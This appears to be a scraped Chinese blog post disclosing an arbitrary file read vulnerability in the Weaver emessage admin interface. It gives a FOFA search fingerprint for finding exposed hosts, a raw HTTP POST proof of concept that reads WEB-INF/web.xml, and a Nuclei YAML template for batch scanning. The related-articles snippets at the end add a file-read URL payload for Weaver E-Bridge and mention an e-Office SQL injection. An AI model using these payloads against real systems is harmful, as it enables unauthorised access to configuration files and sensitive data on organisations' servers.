首页 > 其他分享 >泛微emessage管理界面存在任意文件读取漏洞2023

泛微emessage管理界面存在任意文件读取漏洞2023

时间:2023-10-19 22:55:50浏览次数:84  
标签:emessage 读取 Content 漏洞 537.36 2023 泛微

漏洞简介

泛微 emessage 管理界面存在任意文件读取漏洞隐患,攻击者可通过此漏洞获取敏感信息,为下一步攻击做准备。

漏洞复现

fofa语法:icon_hash="-1477694668"
登录页面如下:

POC:

POST / HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Length: 43
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate

decorator=%2FWEB-INF%2Fweb.xml&confirm=true

nuclei批量yaml文件

id: fanwei_emessage_decorator_fileread
info:
  name: 泛微emessage管理界面存在任意文件读取漏洞2023
  author: mhb17
  severity: high
  description: 

requests:
  - raw:
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 43

        decorator=%2FWEB-INF%2Fweb.xml&confirm=true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - <servlet-name>
      - type: word
        part: body
        words:
          - <?xml
      - type: word
        part: header
        words:
          - '200'

标签:emessage,读取,Content,漏洞,537.36,2023,泛微
From: https://www.cnblogs.com/pursue-security/p/17775900.html

相关文章

  • CSP-S 2023 游记
    Day-12第一次打Div.1!!!然后:(乐)Day-2背板!有好多没背的。/ll平衡树应该可以被别的代替吧。/dxhttps://www.luogu.com.cn/contest/140258Day-1开坑,补之前发生的东西。......
  • 泛微E-Bridge saveYZJFile任意文件读取漏洞
    漏洞描述泛微云桥e-Bridge存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。漏洞复现fofa语法:app="泛微云桥e-Bridge"登录页面如下:windows系统POC:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txtLinux......
  • 2023.10.19
    今天上课验收了ERP页面原型,大家验收面临的问题大多是对流程的不清楚,首先是依据订单再生产,而不是有的人认为的看见仓库数量再去打印订单。也是我自己的问题,上课时老师也为我们提供了账号和密码,我们登录上去看一下流程,做的原型页面都不会这么差。上课老师留的课后作业有没有去看,自己......
  • 泛微E-Office json_common.php文件存在sql注入漏洞
    漏洞简介泛微e-office为企业办公提供丰富应用,覆盖常见协作场景,开箱即用。满足人事、行政、财务、销售、运营、市场等不同部门协作需求,帮助组织高效人事管理。系统json_common.php文件存在SQL注入漏洞漏洞复现fofa语法:app="泛微-EOffice"登录页面如下:POC:POST/building/......
  • 2023-2024-1 20231312 《计算机与程序设计》第四周学习总结
    作业信息这个作业属于哪个课程<班级的链接>2023-2024-1-计算机基础与程序设计|-这个作业要求在哪里<作业要求链接>2023-2024-1计算机基础与程序设计第四周作业|这个作业的目标《计算机基础概论》第4,5章《C语言程序设计》第3章|作业正文作业链接教材学......
  • 2023-10-19 第22本书《Jenkins 2.x 实践指南》
    囫囵吞枣读完的,也算听有收获的,他这里面介绍了ansible集成进jenkins感觉有点搞头。收益是:方便部署到多台服务器。明天继续研究一下把。 总体讲的还行,继续看看把。 主要是,我最近有点疲惫,没啥状态。心里乱乱的。 ......
  • 2023.10.19
    在java处理异常中,finally语句块一定会执行的吗?packagedada;publicclassSystemExitAndFinally{publicstaticvoidmain(String[]args){try{System.out.println("inmain");thrownewException("Exceptionist......
  • 20231019打卡
    上午的课程是UML的序列图和协作图。在这门课上,我们学习了UML建模语言中的序列图和协作图,这是一种图形化的表示方法,用于描述对象间的交互和协作过程。通过老师的讲解和实践练习,我对序列图和协作图的概念和绘制规则有了更深入的理解。这种图形化的表达方式对于我们软件工程师来说非......
  • 2023/10/19 动手动脑
    首先,一个程序如果碰到了异常不处理,程序就会立即停止,而异常处理就是在异常发生的情况下启动类似于备用方案使程序继续运行Java中的异常捕获结构由try,catch,finally三部分构成,其中,try和catch是必须同时存在的。try中的代码就是可能存在异常的代码,catch中的代码就是try中有异常时的......
  • 2023.10.19——每日总结
    学习所花时间(包括上课):9h代码量(行):0行博客量(篇):1篇今天,上午学习,下午学习;我了解到的知识点:1.运气不好,只能得0分;运气好,可以得5分;明日计划:学习......